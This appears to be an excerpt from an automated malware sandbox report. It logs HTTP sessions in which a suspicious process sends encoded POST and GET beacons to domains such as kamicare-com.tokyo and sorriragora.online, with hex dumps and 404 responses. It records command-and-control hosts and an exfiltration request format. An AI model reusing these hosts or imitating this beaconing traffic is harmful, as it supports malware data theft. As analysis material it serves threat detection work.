                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.kamicare-com.tokyo/sryw/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 76 39 68 65 2f 6e 35 67 61 78 71 37 41 66 57 56 59 65 49 77 7a 56 76 58 67 72 46 4a 50 6f 41 72 4d 6b 68 61 73 46 74 4a 44 47 71 47 4c 36 6e 6e 41 6f 69 4b 68 46 59 43 52 4a 79 31 2b 6f 67 6b 62 45 72 33 4e 2b 6a 52 6c 31 69 4a 4d 78 48 4f 78 6e 37 6b 79 2b 41 41 77 6e 4c 68 49 56 43 50 5a 42 66 35 32 66 56 54 77 31 72 2b 46 5a 61 35 56 52 53 4e 5a 64 58 74 77 6a 6d 51 2b 44 36 42 6d 79 61 44 64 67 4c 4d 4a 46 77 78 47 4f 4d 70 76 65 63 38 59 79 4a 6f 66 79 41 63 4a 4f 5a 59 78 50 49 31 30 45 55 4e 68 51 71 4f 51 43 55 56 71 71 78 6a 67 65 64 48 67 65 73 70 70 66 38 41 68 79 61 52 36 42 6d 67 59 70 79 48 75 69 42 53 6b 57 71 43 52 6e 6a 74 48 68 78 6e 44 37 6a 31 39 41 3d 3d
                                        Data Ascii: mvjDMBx8=v9he/n5gaxq7AfWVYeIwzVvXgrFJPoArMkhasFtJDGqGL6nnAoiKhFYCRJy1+ogkbEr3N+jRl1iJMxHOxn7ky+AAwnLhIVCPZBf52fVTw1r+FZa5VRSNZdXtwjmQ+D6BmyaDdgLMJFwxGOMpvec8YyJofyAcJOZYxPI10EUNhQqOQCUVqqxjgedHgesppf8AhyaR6BmgYpyHuiBSkWqCRnjtHhxnD7j19A==
                                        Aug 27, 2024 08:44:40.939760923 CEST367INHTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:44:40 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Content-Length: 203
                                        Connection: close
                                        Server: Apache
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 79 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        47192.168.2.651245157.7.44.213805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:42.697398901 CEST1886OUTPOST /sryw/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kamicare-com.tokyo
                                        Origin: http://www.kamicare-com.tokyo
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.kamicare-com.tokyo/sryw/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 76 39 68 65 2f 6e 35 67 61 78 71 37 41 66 57 56 59 65 49 77 7a 56 76 58 67 72 46 4a 50 6f 41 72 4d 6b 68 61 73 46 74 4a 44 47 69 47 4c 6f 76 6e 41 4c 4b 4b 67 46 59 43 5a 70 79 6f 2b 6f 68 34 62 45 7a 7a 4e 2b 76 42 6c 78 53 4a 4e 54 2f 4f 36 7a 58 6b 37 2b 41 41 34 48 4c 67 46 31 43 57 5a 42 76 39 32 66 46 54 77 31 72 2b 46 62 43 35 51 30 2b 4e 43 64 58 75 33 6a 6e 52 36 44 37 6b 6d 79 43 31 64 67 50 32 4a 56 51 78 47 75 63 70 70 38 45 38 41 69 4a 71 59 79 41 45 4a 4c 42 35 78 50 45 35 30 46 68 6d 68 51 4f 4f 52 53 52 6a 74 59 35 46 7a 2b 52 38 32 5a 49 77 6f 5a 4e 31 73 77 43 77 35 44 71 70 64 5a 4b 49 68 6b 39 59 75 6e 72 48 48 33 48 45 46 6b 49 73 57 59 2b 66 75 55 42 71 36 6c 36 6e 35 66 66 4b 77 43 63 44 39 6a 33 67 66 7a 72 43 56 76 75 78 2b 59 6f 6c 6d 4b 4a 6b 34 72 77 73 37 72 6e 2f 74 78 6b 76 46 6b 42 73 32 63 71 7a 53 5a 74 2b 71 57 44 68 67 52 30 41 55 66 2f 50 64 68 76 47 55 68 37 36 65 45 65 30 2b 30 59 77 6b 50 78 4a 42 4d 72 36 4c 33 6c 6c 31 4c 4a 35 61 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=v9he/n5gaxq7AfWVYeIwzVvXgrFJPoArMkhasFtJDGiGLovnALKKgFYCZpyo+oh4bEzzN+vBlxSJNT/O6zXk7+AA4HLgF1CWZBv92fFTw1r+FbC5Q0+NCdXu3jnR6D7kmyC1dgP2JVQxGucpp8E8AiJqYyAEJLB5xPE50FhmhQOORSRjtY5Fz+R82ZIwoZN1swCw5DqpdZKIhk9YunrHH3HEFkIsWY+fuUBq6l6n5ffKwCcD9j3gfzrCVvux+YolmKJk4rws7rn/txkvFkBs2cqzSZt+qWDhgR0AUf/PdhvGUh76eEe0+0YwkPxJBMr6L3ll1LJ5apwavibcjY+YGFVNTmVEsRqcN6RlNtR47m2NIOFGcRFB7l2A6Ns8SYwqtgPejc/Ock18PrpJPPtYjObUXbkFHEqN6pS4kE/ZOTQCyON5bj/aT235g81Bll1yIgYSUtm+OcHU8byN9Gib+ZQ8U3/Qk6zRpr3W+SUdXuhoezhFmGOrPtRJaMZdlPkTTTWJQp++D1a0o4DpH7C+lfRMbp0eWmOhuxyRIohghrnNmfIuia2rFqHLZcpwpLFrp3yfXniL8sERO9O29OtDgQkAm6pcutAhsUj1fB0j3pDcpj/SR2dy0EcsfZ7jVWrK7MNl6jR4a/YasmfxPXdktw8jik42JVfDbjJEYGfyMt/hqckpUVRui2ng7GisJaeJuEfIcUT+29zBrGn912cPtcA/VapYRVl5WUBoFoqzNWYekXWrTUuG0l785eI15kyAzVB0vmKhEhX1XxzXESgm5VYmd4MT0OBYDb6xtX7KaiwONiyn8yAV8HPtfn7jAcmqVDTfSguVpAqnT+seEmJHj+bMk8zVWDkfSBC6WxmOSGg8cs1b8LHc7WA5KqMnMK6sIaBlyv5VOaxqaKosNYiFh464k08+Ol+QKphjuy3uG7URNo/bmPpCMFVCyTw41SceczeWnm6Ee6RAFYwUvNPSmG/xQoDf1Uu5mLVzGQJIppO [TRUNCATED]
                                        Aug 27, 2024 08:44:43.475512981 CEST367INHTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:44:43 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Content-Length: 203
                                        Connection: close
                                        Server: Apache
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 79 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        48192.168.2.651246157.7.44.213805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:45.232322931 CEST589OUTGET /sryw/?mvjDMBx8=i/J+8XVQTUqjXYi8BOJp91HUxYZ+c6AWCRJ9n1NtfUqKWarFGtf7pFdZZISJr4cvaVfHP+3ktlD0OUvuvz/pl/98wVf2KGrKM2ftp+skyT71Gb7AHg6oN/3q8TTnk2KegzCTKXU=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.kamicare-com.tokyo
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:44:46.077529907 CEST367INHTTP/1.1 404 Not Found
                                        Date: Tue, 27 Aug 2024 06:44:45 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Content-Length: 203
                                        Connection: close
                                        Server: Apache
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 72 79 77 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sryw/ was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        49192.168.2.651247162.240.81.18805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:51.600059032 CEST849OUTPOST /4jqu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.sorriragora.online
                                        Origin: http://www.sorriragora.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.sorriragora.online/4jqu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 32 61 51 6b 34 67 53 43 66 36 50 44 67 6e 35 5a 65 7a 71 73 75 42 44 54 77 61 39 54 61 37 67 6b 33 77 54 41 6b 45 34 2f 34 44 37 6b 45 6b 2f 44 47 68 4b 53 62 59 32 34 2b 58 6a 37 4a 65 55 34 77 34 33 43 32 61 6f 31 6c 73 47 68 2f 78 32 66 74 7a 49 37 53 58 32 4b 51 45 6e 56 79 51 6c 72 41 41 34 46 6f 55 74 68 50 69 6a 59 74 66 50 52 56 34 76 75 31 37 54 32 32 69 58 32 6d 6b 61 52 74 58 42 4d 30 34 78 67 47 57 71 31 36 75 50 41 36 42 55 63 4e 31 38 69 6d 5a 2b 76 54 58 7a 68 2b 78 65 6f 42 39 72 30 2b 6f 6d 37 74 37 37 69 78 74 54 4d 4a 2b 4e 69 6a 50 63 55 4a 59 35 75 50 6f 58 7a 4c 68 68 73 4a 53 38 4e
                                        Data Ascii: mvjDMBx8=2aQk4gSCf6PDgn5ZezqsuBDTwa9Ta7gk3wTAkE4/4D7kEk/DGhKSbY24+Xj7JeU4w43C2ao1lsGh/x2ftzI7SX2KQEnVyQlrAA4FoUthPijYtfPRV4vu17T22iX2mkaRtXBM04xgGWq16uPA6BUcN18imZ+vTXzh+xeoB9r0+om7t77ixtTMJ+NijPcUJY5uPoXzLhhsJS8N
                                        Aug 27, 2024 08:44:52.158901930 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 27 Aug 2024 06:44:52 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "663a05b6-e42"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Aug 27, 2024 08:44:52.158921003 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                        Aug 27, 2024 08:44:52.158934116 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                        Aug 27, 2024 08:44:52.158946037 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                        Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        50192.168.2.651248162.240.81.18805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:54.147631884 CEST873OUTPOST /4jqu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.sorriragora.online
                                        Origin: http://www.sorriragora.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.sorriragora.online/4jqu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 32 61 51 6b 34 67 53 43 66 36 50 44 79 55 78 5a 53 79 71 73 6f 68 44 51 38 36 39 54 44 4c 67 67 33 77 76 41 6b 45 51 56 34 78 66 6b 44 47 6e 44 55 77 4b 53 57 34 32 34 6d 6e 69 2f 55 75 55 4a 77 34 37 4b 32 59 38 31 6c 73 53 68 2f 77 71 66 74 41 67 34 54 48 32 49 4a 30 6e 58 32 51 6c 72 41 41 34 46 6f 55 34 32 50 69 4c 59 74 73 6e 52 54 5a 76 74 72 72 54 31 67 79 58 32 69 6b 61 56 74 58 42 69 30 35 38 48 47 56 53 31 36 73 48 41 36 51 55 62 61 6c 39 49 69 5a 2f 63 57 32 69 64 6e 42 6a 6b 4c 66 7a 32 2f 5a 62 64 6f 4e 36 34 74 65 54 76 62 75 74 67 6a 4e 45 6d 4a 34 35 45 4e 6f 76 7a 5a 32 74 4c 47 6d 5a 75 55 51 68 51 4c 6e 75 43 48 77 4f 57 74 4f 62 5a 4b 75 4c 4a 6d 51 3d 3d
                                        Data Ascii: mvjDMBx8=2aQk4gSCf6PDyUxZSyqsohDQ869TDLgg3wvAkEQV4xfkDGnDUwKSW424mni/UuUJw47K2Y81lsSh/wqftAg4TH2IJ0nX2QlrAA4FoU42PiLYtsnRTZvtrrT1gyX2ikaVtXBi058HGVS16sHA6QUbal9IiZ/cW2idnBjkLfz2/ZbdoN64teTvbutgjNEmJ45ENovzZ2tLGmZuUQhQLnuCHwOWtObZKuLJmQ==
                                        Aug 27, 2024 08:44:54.707762957 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx/1.20.1
                                        Date: Tue, 27 Aug 2024 06:44:54 GMT
                                        Content-Type: text/html
                                        Content-Length: 3650
                                        Connection: close
                                        ETag: "663a05b6-e42"
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                        Aug 27, 2024 08:44:54.707789898 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                        Aug 27, 2024 08:44:54.707803011 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                        Aug 27, 2024 08:44:54.707962990 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                        Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        51192.168.2.651249162.240.81.18805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:44:56.692435026 CEST1886OUTPOST /4jqu/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.sorriragora.online
                                        Origin: http://www.sorriragora.online
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.sorriragora.online/4jqu/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 32 61 51 6b 34 67 53 43 66 36 50 44 79 55 78 5a 53 79 71 73 6f 68 44 51 38 36 39 54 44 4c 67 67 33 77 76 41 6b 45 51 56 34 78 58 6b 44 31 76 44 47 44 53 53 58 34 32 34 72 48 69 38 55 75 55 75 77 34 6a 4f 32 59 78 43 6c 75 71 68 2b 53 69 66 76 78 67 34 5a 48 32 49 55 45 6e 57 79 51 6c 45 41 44 51 42 6f 55 6f 32 50 69 4c 59 74 71 62 52 51 49 76 74 70 72 54 32 32 69 58 41 6d 6b 61 74 74 58 70 55 30 35 70 77 48 6c 79 31 35 50 76 41 31 43 38 62 5a 46 38 75 76 35 2f 45 57 32 75 34 6e 43 48 53 4c 65 47 54 2f 61 48 64 70 35 33 31 71 39 4c 49 5a 64 35 71 31 71 73 68 4d 4d 70 31 46 70 66 35 55 55 67 2b 48 58 39 77 4e 31 70 6d 66 56 6a 53 53 68 61 4e 6a 37 69 51 44 64 79 67 39 49 4a 53 75 63 36 37 6b 69 62 54 4c 63 4d 30 6b 5a 49 53 78 70 63 4c 68 55 55 51 49 41 4a 78 65 51 6f 37 47 42 67 36 79 77 70 39 65 42 6b 4e 39 73 4a 66 50 57 44 41 43 58 47 38 4e 79 58 73 76 36 38 48 49 6d 47 71 48 77 38 47 48 57 7a 79 33 4a 78 4e 4d 62 36 6b 6d 57 67 66 62 76 34 4a 39 34 69 61 4b 47 79 59 61 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=2aQk4gSCf6PDyUxZSyqsohDQ869TDLgg3wvAkEQV4xXkD1vDGDSSX424rHi8UuUuw4jO2YxCluqh+Sifvxg4ZH2IUEnWyQlEADQBoUo2PiLYtqbRQIvtprT22iXAmkattXpU05pwHly15PvA1C8bZF8uv5/EW2u4nCHSLeGT/aHdp531q9LIZd5q1qshMMp1Fpf5UUg+HX9wN1pmfVjSShaNj7iQDdyg9IJSuc67kibTLcM0kZISxpcLhUUQIAJxeQo7GBg6ywp9eBkN9sJfPWDACXG8NyXsv68HImGqHw8GHWzy3JxNMb6kmWgfbv4J94iaKGyYa0vGb8UJZOyseOoDgu17GG3ogJvsSt/TnR75na/KLG32jUycFK6skkiD/rIWMeBjFq8sXgr0nE2HGoD9ReJbW+3/ikzIFXYPbeSzKI4/Gf0r3Cybs+w3+4DK5xdF89wq3HHcmt2r2Xn7b+lixTwO7dnKW7aSTShTid6aA1Hf5i0P1Z4PGO1FVsUhfA7j7XQLBlPCRFIxopIkEvLzlRaIF+3HceowkIYweyPREFl3HbDziTbx9AjVQMsW/woKV8pWnUHRToQLCtUcEswfnhSGYYG0MJzwfGyKFsxxdcmKgOaW6hVc0D3pdrMTBqPN3Bu+Swj/9t83grTctvFDYJ2Dmzq0xLucgishsmHdisa5QrdiHqt4LO5CFzJRh2UctnwlNAJledJoFpVYqR/8jHlzMWaATW/vPvPJMFOhtKCKE7JSE43HMgoiVV/CYi9gje7haKkv/rW7mFQzlIRaUC8z3Nw41omNnESurhhQWWb79H6k1r+M/KH2v6IgbzvDvZC19R